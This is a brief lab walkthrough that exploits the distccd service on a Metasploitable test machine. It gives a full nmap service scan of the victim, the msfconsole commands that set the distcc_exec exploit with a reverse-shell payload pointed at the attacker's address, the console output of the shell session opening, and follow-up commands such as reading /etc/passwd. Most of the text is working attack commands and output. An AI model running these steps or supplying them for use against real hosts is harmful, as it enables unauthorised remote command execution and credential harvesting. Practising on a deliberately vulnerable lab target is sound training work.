Metasploit-exploit/unix/misc/distcc_exec

Test Setting

Victim : 192.168.8.144

Attacker : 192.168.8.135

1. First you can scan victim system with Kali

# nmap -sV -sS -p1-65000 192.168.8.144

root@kali:~# nmap -sV -sS -p1-65000 192.168.8.144

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-02-06 18:56 EST

Nmap scan report for 192.168.8.144

Host is up (0.000082s latency).

Not shown: 64970 closed ports

PORT      STATE SERVICE     VERSION

21/tcp    open  ftp         vsftpd 2.3.4

22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)

23/tcp    open  telnet      Linux telnetd

25/tcp    open  smtp        Postfix smtpd

53/tcp    open  domain      ISC BIND 9.4.2

80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)

111/tcp   open  rpcbind     2 (RPC #100000)

139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

512/tcp   open  exec        netkit-rsh rexecd

513/tcp   open  login?

514/tcp   open  shell       Netkit rshd

1099/tcp  open  rmiregistry GNU Classpath grmiregistry

1524/tcp  open  shell       Metasploitable root shell

2049/tcp  open  nfs         2-4 (RPC #100003)

2121/tcp  open  ftp         ProFTPD 1.3.1

3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5

3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7

5900/tcp  open  vnc         VNC (protocol 3.3)

6000/tcp  open  X11         (access denied)

6667/tcp  open  irc         Unreal ircd

6697/tcp  open  irc         Unreal ircd

8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)

8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1

8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)

34716/tcp open  status      1 (RPC #100024)

40576/tcp open  unknown

43521/tcp open  nlockmgr    1-4 (RPC #100021)

53327/tcp open  mountd      1-3 (RPC #100005)

MAC Address: 00:0C:29:C7:C8:FB (VMware)

Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 157.61 seconds

2. 

#service postgresql start

#msfconsole

> search distccd

  exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

> use exploit/unix/misc/distcc_exec

> set rhost 192.168.8.144

> set payload cmd/unix/reverse

> set lhost 192.168.8.135

> options

> exploit

msf exploit(distcc_exec) > exploit

[*] Started reverse TCP double handler on 192.168.8.135:4444 

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo 4TILbdljh58U7Rw0;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "4TILbdljh58U7Rw0\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.8.135:4444 -> 192.168.8.144:59463) at 2017-02-06 21:12:16 -0500

ifconfig

cat /etc/passwd

...